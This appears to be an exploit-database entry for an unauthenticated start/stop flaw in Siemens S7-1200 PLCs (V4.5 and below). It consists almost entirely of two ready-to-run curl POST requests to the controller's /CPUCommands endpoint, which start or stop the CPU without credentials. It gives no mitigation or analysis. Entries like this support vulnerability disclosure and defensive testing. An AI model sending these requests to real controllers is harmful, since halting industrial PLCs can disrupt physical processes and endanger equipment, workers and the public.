Authored by RoseSecurity

Siemens S7-1200 versions 4.5 and below have an unauthenticated CPU start/stop command vulnerability.

# Exploit Title: Unauthenticated Siemens S7-1200 CPU Start/Stop Command
# Date: 09/03/2022
# Exploit Author: RoseSecurity
# Vendor Homepage: https://www.siemens.com/global/en.html
# Version: V4.5 and below
# Tested on: Siemens S7-1200 (CPU: 1215C)

# IP == PLC IP address

# Start Command

curl -i -s -k -X $'POST' -H $'Host: <IP>' -H $'Content-Length: 19' -H $'Cache-Control:max-age=0' -H $'Upgrade-Insecure-Requests: 1' -H $'Origin: http://<IP>' -H $'Content-Type: application/x-www-form-urlencoded' -H $'User-Agent: Mozilla/5.0. (Windows NT 10.0; Win64; x64) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' -H $'Accept: text/html, application /xhmtl+xml, application/xml; q=0.9,image/avif, image/webp, image/apng,*/ - *; q=0.8, application/signed-exchange; v=b3; q=0.9' -H $'Referer: http://<IP>/Portal/Portal.mwsl?PriNav=Start' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US, en; q=0.9' -H $'Connection: close' -b $'siemens_automation_no_intro=TRUE' --data-binary $'Run=1&PriNav=Start' 'http://<IP>/CPUCommands'

# Stop Command

curl -i -s -k -X $'POST' -H $'Host: <IP>' -H $'Content-Length: 19' -H $'Cache-Control:max-age=0' -H $'Upgrade-Insecure-Requests: 1' -H $'Origin: http://<IP>' -H $'Content-Type: application/x-www-form-urlencoded' -H $'User-Agent: Mozilla/5.0. (Windows NT 10.0; Win64; x64) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' -H $'Accept: text/html, application /xhmtl+xml, application/xml; q=0.9,image/avif, image/webp, image/apng,*/ - *; q=0.8, application/signed-exchange; v=b3; q=0.9' -H $'Referer: http://<IP>/Portal/Portal.mwsl?PriNav=Start' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US, en; q=0.9' -H $'Connection: close' -b $'siemens_automation_no_intro=TRUE' --data-binary $'Run=1&PriNav=Stop' 'http://<IP>/CPUCommands'